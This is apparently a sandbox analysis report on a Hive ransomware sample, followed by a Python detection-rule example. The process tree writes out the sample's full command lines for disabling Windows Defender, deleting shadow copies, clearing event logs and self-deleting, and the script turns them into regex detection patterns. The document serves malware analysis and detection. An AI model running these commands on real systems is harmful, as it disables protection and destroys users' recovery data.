Analysis
Max time kernel: 179s
Max time network: 124s
Platform: windows7_x64
Resource: win7-en-20211208
Submitted: 12-01-2022 14:50

Static task: static1

Behavioral task: behavioral1
  Sample: a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe
  Resource: win7-en-20211208

Behavioral task: behavioral2
  Sample: a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe
  Resource: win10-en-20211208
General
Target: a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe
Size: 3.5MB
MD5: 851a6706bd679387f197f552dae896bc
SHA1: ee7d2cf647ee85becd133146b4f600f2fa6965e8
SHA256: a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b
SHA512: ba586db7ec4cc3bf89f2e2ad037f1a36e139f55e125087a3840331bb7d47105cffb2d4e46b154fde07007f0e7b8be202fa76f0eca7636409f3c47484bd081a1e
Malware Config
Extracted from: C:\Program Files\7-Zip\wPfq_HOW_TO_DECRYPT.txt
Family: hive
URLs:
http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/
http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/
Signatures

Deletes Windows Defender Definitions (2 TTPs, 1 IoC)
Uses mpcmdrun utility to delete all AV definitions.
Processes: MpCmdRun.exe (PID 2108)

Hive
A ransomware written in Golang first seen in June 2021.
Modifies security service (2 TTPs, 1 IoC)
Processes: reg.exe set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4"
Clears Windows event logs (1 TTP)

Deletes shadow copies (2 TTPs)
Ransomware often targets backup files to inhibit system recovery.

Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.
Drops file in Program Files directory (64 IoCs)
Processes: a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe
Launches sc.exe
Sc.exe is a Windows utility to control services on the system.
Interacts with shadow copies (2 TTPs, 1 IoC)
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes: vssadmin.exe (PID 1960)
Opens file in notepad (likely ransom note) (1 IoC)
Processes: notepad.exe (PID 2572)
Runs net.exe

Runs ping.exe (1 TTP, 1 IoC)
Suspicious behavior: EnumeratesProcesses (3 IoCs)
Processes: powershell.exe (PID 2140), powershell.exe (PID 2220), a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe (PID 964)
Suspicious use of AdjustPrivilegeToken (64 IoCs)
Processes (token privileges enabled):
wevtutil.exe (PID 1500): SeSecurityPrivilege, SeBackupPrivilege
wevtutil.exe (PID 1916): SeSecurityPrivilege, SeBackupPrivilege
wevtutil.exe (PID 868): SeSecurityPrivilege, SeBackupPrivilege
wmic.exe (PID 1992): SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35
wmic.exe (PID 1360): same privilege set as PID 1992
Suspicious use of WriteProcessMemory (64 IoCs)
Processes (parent PID wrote to target PID):
964 a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe -> 1876 net.exe
1876 net.exe -> 660 net1.exe
964 a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe -> 472 net.exe
472 net.exe -> 272 net1.exe
964 a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe -> 580 net.exe
580 net.exe -> 1492 net1.exe
964 a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe -> 1652 net.exe
1652 net.exe -> 1800 net1.exe
964 a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe -> 892 net.exe
892 net.exe -> 1324 net1.exe
964 a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe -> 1620 net.exe
1620 net.exe -> 1984 net1.exe
964 a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe -> 1804 net.exe
1804 net.exe -> 1220 net1.exe
964 a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe -> 1552 net.exe
1552 net.exe -> 1952 net1.exe
(each pair is recorded four times in the raw report)
Processes (indented by depth in the process tree)

C:\Users\Admin\AppData\Local\Temp\a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe (PID 964)
  Command line: "C:\Users\Admin\AppData\Local\Temp\a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe"
  - Drops file in Program Files directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory

  C:\Windows\SysWOW64\net.exe (PID 1876)
    Command line: net.exe stop "NetMsmqActivator" /y
    - Suspicious use of WriteProcessMemory
    C:\Windows\SysWOW64\net1.exe (PID 660)
      Command line: C:\Windows\system32\net1 stop "NetMsmqActivator" /y

  C:\Windows\SysWOW64\net.exe (PID 472)
    Command line: net.exe stop "SamSs" /y
    - Suspicious use of WriteProcessMemory
    C:\Windows\SysWOW64\net1.exe (PID 272)
      Command line: C:\Windows\system32\net1 stop "SamSs" /y

  C:\Windows\SysWOW64\net.exe (PID 580)
    Command line: net.exe stop "SDRSVC" /y
    - Suspicious use of WriteProcessMemory
    C:\Windows\SysWOW64\net1.exe (PID 1492)
      Command line: C:\Windows\system32\net1 stop "SDRSVC" /y

  C:\Windows\SysWOW64\net.exe (PID 1652)
    Command line: net.exe stop "SstpSvc" /y
    - Suspicious use of WriteProcessMemory
    C:\Windows\SysWOW64\net1.exe (PID 1800)
      Command line: C:\Windows\system32\net1 stop "SstpSvc" /y

  C:\Windows\SysWOW64\net.exe (PID 892)
    Command line: net.exe stop "UI0Detect" /y
    - Suspicious use of WriteProcessMemory
    C:\Windows\SysWOW64\net1.exe (PID 1324)
      Command line: C:\Windows\system32\net1 stop "UI0Detect" /y

  C:\Windows\SysWOW64\net.exe (PID 1620)
    Command line: net.exe stop "VSS" /y
    - Suspicious use of WriteProcessMemory
    C:\Windows\SysWOW64\net1.exe (PID 1984)
      Command line: C:\Windows\system32\net1 stop "VSS" /y

  C:\Windows\SysWOW64\net.exe (PID 1804)
    Command line: net.exe stop "wbengine" /y
    - Suspicious use of WriteProcessMemory
    C:\Windows\SysWOW64\net1.exe (PID 1220)
      Command line: C:\Windows\system32\net1 stop "wbengine" /y

  C:\Windows\SysWOW64\net.exe (PID 1552)
    Command line: net.exe stop "WebClient" /y
    - Suspicious use of WriteProcessMemory
    C:\Windows\SysWOW64\net1.exe (PID 1952)
      Command line: C:\Windows\system32\net1 stop "WebClient" /y

  C:\Windows\SysWOW64\sc.exe (PID 1716)
    Command line: sc.exe config "NetMsmqActivator" start= disabled

  C:\Windows\SysWOW64\sc.exe (PID 1796)
    Command line: sc.exe config "SamSs" start= disabled

  C:\Windows\SysWOW64\sc.exe (PID 1004)
    Command line: sc.exe config "SDRSVC" start= disabled

  C:\Windows\SysWOW64\sc.exe (PID 1516)
    Command line: sc.exe config "SstpSvc" start= disabled

  C:\Windows\SysWOW64\sc.exe (PID 1748)
    Command line: sc.exe config "UI0Detect" start= disabled

  C:\Windows\SysWOW64\sc.exe (PID 1328)
    Command line: sc.exe config "VSS" start= disabled

  C:\Windows\SysWOW64\sc.exe (PID 2004)
    Command line: sc.exe config "wbengine" start= disabled

  C:\Windows\SysWOW64\sc.exe (PID 996)
    Command line: sc.exe config "WebClient" start= disabled

  C:\Windows\SysWOW64\reg.exe (PID 904)
    Command line: reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

  C:\Windows\SysWOW64\reg.exe (PID 1488)
    Command line: reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f

  C:\Windows\SysWOW64\reg.exe (PID 516)
    Command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f

  C:\Windows\SysWOW64\reg.exe (PID 1868)
    Command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f

  C:\Windows\SysWOW64\reg.exe (PID 296)
    Command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f

  C:\Windows\SysWOW64\reg.exe (PID 1984)
    Command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f

  C:\Windows\SysWOW64\reg.exe (PID 1364)
    Command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f

  C:\Windows\SysWOW64\reg.exe (PID 1592)
    Command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f

  C:\Windows\SysWOW64\reg.exe (PID 1688)
    Command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f

  C:\Windows\SysWOW64\reg.exe (PID 1824)
    Command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f

  C:\Windows\SysWOW64\reg.exe (PID 1388)
    Command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f

  C:\Windows\SysWOW64\reg.exe (PID 1744)
    Command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f

  C:\Windows\SysWOW64\reg.exe (PID 1060)
    Command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f

  C:\Windows\SysWOW64\reg.exe (PID 924)
    Command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f

  C:\Windows\SysWOW64\reg.exe (PID 1524)
    Command line: reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f

  C:\Windows\SysWOW64\reg.exe (PID 1508)
    Command line: reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f

  C:\Windows\SysWOW64\schtasks.exe (PID 1692)
    Command line: schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable

  C:\Windows\SysWOW64\schtasks.exe (PID 1108)
    Command line: schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable

  C:\Windows\SysWOW64\schtasks.exe (PID 1548)
    Command line: schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable

  C:\Windows\SysWOW64\schtasks.exe (PID 972)
    Command line: schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable

  C:\Windows\SysWOW64\schtasks.exe (PID 1336)
    Command line: schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable

  C:\Windows\SysWOW64\reg.exe (PID 1776)
    Command line: reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f

  C:\Windows\SysWOW64\reg.exe (PID 1728)
    Command line: reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f

  C:\Windows\SysWOW64\reg.exe (PID 1736)
    Command line: reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f

  C:\Windows\SysWOW64\reg.exe (PID 1484)
    Command line: reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f

  C:\Windows\SysWOW64\reg.exe (PID 932)
    Command line: reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f

  C:\Windows\SysWOW64\reg.exe (PID 1976)
    Command line: reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f

  C:\Windows\SysWOW64\reg.exe (PID 2000)
    Command line: reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f

  C:\Windows\SysWOW64\reg.exe (PID 1752)
    Command line: reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f

  C:\Windows\SysWOW64\reg.exe (PID 1356)
    Command line: reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f

  C:\Windows\SysWOW64\reg.exe (PID 1496)
    Command line: reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f

  C:\Windows\SysWOW64\reg.exe (PID 1324)
    Command line: reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
    - Modifies security service

  C:\Windows\SysWOW64\reg.exe (PID 1696)
    Command line: reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

  C:\Windows\SysWOW64\vssadmin.exe (PID 1960)
    Command line: vssadmin.exe delete shadows /all /quiet
    - Interacts with shadow copies

  C:\Windows\SysWOW64\wevtutil.exe (PID 1500)
    Command line: wevtutil.exe cl system
    - Suspicious use of AdjustPrivilegeToken

  C:\Windows\SysWOW64\wevtutil.exe (PID 1916)
    Command line: wevtutil.exe cl security
    - Suspicious use of AdjustPrivilegeToken

  C:\Windows\SysWOW64\wevtutil.exe (PID 868)
    Command line: wevtutil.exe cl application
    - Suspicious use of AdjustPrivilegeToken

  C:\Windows\SysWOW64\Wbem\wmic.exe (PID 1992)
    Command line: wmic.exe SHADOWCOPY /nointeractive
    - Suspicious use of AdjustPrivilegeToken

  C:\Windows\SysWOW64\Wbem\wmic.exe (PID 1360)
    Command line: wmic.exe shadowcopy delete
    - Suspicious use of AdjustPrivilegeToken

  C:\Windows\SysWOW64\cmd.exe (PID 2084)
    Command line: cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All3⤵
- Deletes Windows Defender Definitions
PID:2108 -
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true2⤵PID:2120
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIOAVProtection $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2140 -
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true2⤵PID:2200
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2220 -
C:\Windows\SysWOW64\notepad.exenotepad.exe C:\wPfq_HOW_TO_DECRYPT.txt2⤵
- Opens file in notepad (likely ransom note)
PID:2572 -
C:\Windows\SysWOW64\cmd.execmd.exe /D /C ping.exe -n 5 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe"2⤵PID:2580
-
C:\Windows\SysWOW64\PING.EXEping.exe -n 5 127.0.0.13⤵
- Runs ping.exe
PID:2608
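The process tree above is the complete pre-encryption chain of this sample: Defender policy, services, ETW autologgers, scheduled tasks and autoruns are switched off with reg.exe and schtasks.exe, signatures are removed with MpCmdRun.exe, IOAV and real-time protection are turned off through Set-MpPreference, shadow copies are enumerated and deleted, the System, Security and Application logs are cleared, and after the ransom note is opened the binary deletes itself behind a ping delay. As an added example that is not part of the sandbox report, the Python below encodes each of those command lines as a detection rule, runs the rules over a constructed set of process-creation events (copied or lightly shortened from the tree, plus a few benign look-alikes) and rolls the hits up to a host-level verdict. The rule labels, the tactic grouping and the verdict thresholds are this example's own choices, not anything the report defines.

```python
"""Added example (not part of the sandbox report): match process-creation
command lines against the Defender-tampering, shadow-copy and log-clearing
commands the Hive sample ran, then roll the hits up into a verdict."""
import re
from collections import Counter

# (label, tactic, pattern).  Patterns are written against the exact command
# lines in the report; label and tactic names are this example's own.
RULES = [
    ("defender_policy_tamper", "impair_defenses",
     r'\breg(?:\.exe)?\s+add\s+"HKLM\\Software\\Policies\\Microsoft\\Windows Defender'),
    ("defender_service_disabled", "impair_defenses",
     r'\breg(?:\.exe)?\s+add\s+"HKLM\\System\\CurrentControlSet\\Services\\'
     r'(?:WinDefend|WdBoot|WdFilter|WdNisDrv|WdNisSvc|SecurityHealthService)"'
     r'\s+/v\s+"?Start"?\s.*?/d\s+"?4"?(?:\s|$)'),          # Start=4 is SERVICE_DISABLED
    ("defender_etw_logger_off", "impair_defenses",
     r'Autologger\\Defender(?:Api|Audit)Logger"\s+/v\s+"?Start"?\s.*?/d\s+"?0"?(?:\s|$)'),
    ("defender_task_disabled", "impair_defenses",
     r'\bschtasks(?:\.exe)?\s+/Change\s+/TN\s+"Microsoft\\Windows\\'
     r'(?:Windows Defender|ExploitGuard)\\[^"]+"\s+/Disable\b'),
    ("defender_autorun_removed", "impair_defenses",
     r'\breg(?:\.exe)?\s+delete\s+.*?(?:/v\s+"Windows ?Defender"|ContextMenuHandlers\\EPP")'),
    ("defender_definitions_removed", "impair_defenses",
     r'MpCmdRun\.exe"?\s+-RemoveDefinitions\s+-All\b'),
    ("defender_preference_disabled", "impair_defenses",
     r'Set-MpPreference\s+-Disable(?:IOAVProtection|RealtimeMonitoring)\s+\$true\b'),
    ("shadow_copies_deleted", "inhibit_recovery",
     r'\bvssadmin(?:\.exe)?\s+delete\s+shadows\b|\bwmic(?:\.exe)?\s+shadowcopy\s+delete\b'),
    ("shadow_copies_enumerated", "inhibit_recovery",
     r'\bwmic(?:\.exe)?\s+shadowcopy\b(?!\s+delete\b)'),   # the "SHADOWCOPY /nointeractive" step
    ("event_logs_cleared", "indicator_removal",
     r'\bwevtutil(?:\.exe)?\s+cl\s+(?:system|security|application)\b'),
    ("self_delete_after_ping", "indicator_removal",
     r'\bping(?:\.exe)?\s+-n\s+\d+\s+127\.0\.0\.1\s*&&\s*del\s'),  # parent cmd.exe line, not the child ping
]
COMPILED = [(label, re.compile(pat, re.IGNORECASE)) for label, _tactic, pat in RULES]
TACTIC_OF = {label: tactic for label, tactic, _pat in RULES}

# Constructed process-creation events (pid, command line): the first block is
# copied from the report's tree (self-delete path shortened), the rest are benign look-alikes.
SAMPLE_EVENTS = [
    (1824, r'reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f'),
    (1524, r'reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f'),
    (1692, r'schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable'),
    (1776, r'reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f'),
    (1484, r'reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f'),
    (1324, r'reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f'),
    (1960, r'vssadmin.exe delete shadows /all /quiet'),
    (1500, r'wevtutil.exe cl system'),
    (1992, r'wmic.exe SHADOWCOPY /nointeractive'),
    (1360, r'wmic.exe shadowcopy delete'),
    (2084, r'cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All'),
    (2140, r'powershell Set-MpPreference -DisableIOAVProtection $true'),
    (2580, r'cmd.exe /D /C ping.exe -n 5 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\sample.exe"'),
    (3001, r'reg.exe query "HKLM\System\CurrentControlSet\Services\WinDefend" /v Start'),
    (3002, r'vssadmin.exe list shadows'),
    (3003, r'schtasks.exe /Query /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan"'),
    (3004, r'ping.exe -n 5 127.0.0.1'),
]


def classify(cmdline):
    """Labels of every rule the command line matches (empty list if none)."""
    return [label for label, rx in COMPILED if rx.search(cmdline)]


def assess(events):
    """Roll per-process hits up to a verdict.

    One hit on its own (an admin clearing a log) is only 'suspicious'.  Impaired
    defences together with destroyed recovery points is the pre-encryption
    pattern the tree shows, so that combination gets the strongest verdict.
    """
    hits, tactics, flagged = Counter(), set(), []
    for pid, cmdline in events:
        labels = classify(cmdline)
        for label in labels:
            hits[label] += 1
            tactics.add(TACTIC_OF[label])
        if labels:
            flagged.append((pid, labels))
    if {"impair_defenses", "inhibit_recovery"} <= tactics:
        verdict = "ransomware_precursor"
    elif tactics:
        verdict = "suspicious"
    else:
        verdict = "clean"
    return {"verdict": verdict, "tactics": sorted(tactics),
            "hits": dict(hits), "flagged": flagged}


if __name__ == "__main__":
    result = assess(SAMPLE_EVENTS)
    print(result["verdict"], result["tactics"])
    for pid, labels in result["flagged"]:
        print(f"  PID {pid}: {', '.join(labels)}")
```

Two details worth keeping when porting this to a real rule set: the self-deletion signal lives only on the parent `cmd.exe /D /C ping.exe -n 5 127.0.0.1 && del "..."` line, because the child `ping.exe -n 5 127.0.0.1` (PID 2608 in the tree) is indistinguishable from a legitimate ping, and `wmic.exe SHADOWCOPY /nointeractive` is a read that precedes the `wmic.exe shadowcopy delete`, so the enumeration rule is a weaker, earlier signal than the deletion rule.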
Network
MITRE ATT&CK Enterprise v6
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
MD5 352a482d3076e201ca52f100f02bc42a
SHA1 27c6bdabdc3ea33a49a75d1377ba6aaf9261b93d
SHA256 114bb2f120c0bc0bd5d9f24bc5334a21bd9ab27b6d4e3921cd33cf7c84fe3ce5
SHA512 a55a64392b02bdfa77dc35aea3e57fd4ecc5e83aa84e041c7dcd974170284b4caf2c10ee0f76ef04ab90d1e89e5a886886095ddbc4331b5fe55145de9dc64ccd
-
MD5 3d3aab4fac96343c7e4bf9f111f89193
SHA1 550d2ea76bb0a789e4bfbefef4a899c4fbad254c
SHA256 54643189ee659f0e200ac4eb1ae678f35c016e0905eca63e675dbeadfc2422d8
SHA512 15b065276f0f8acd76c54462a6f71153e0df65a10aff76412bf2582940b46ff64124e2577e320220aa9c0daf1e4d3f5fc5d4d78aee5979e60a10690a702badda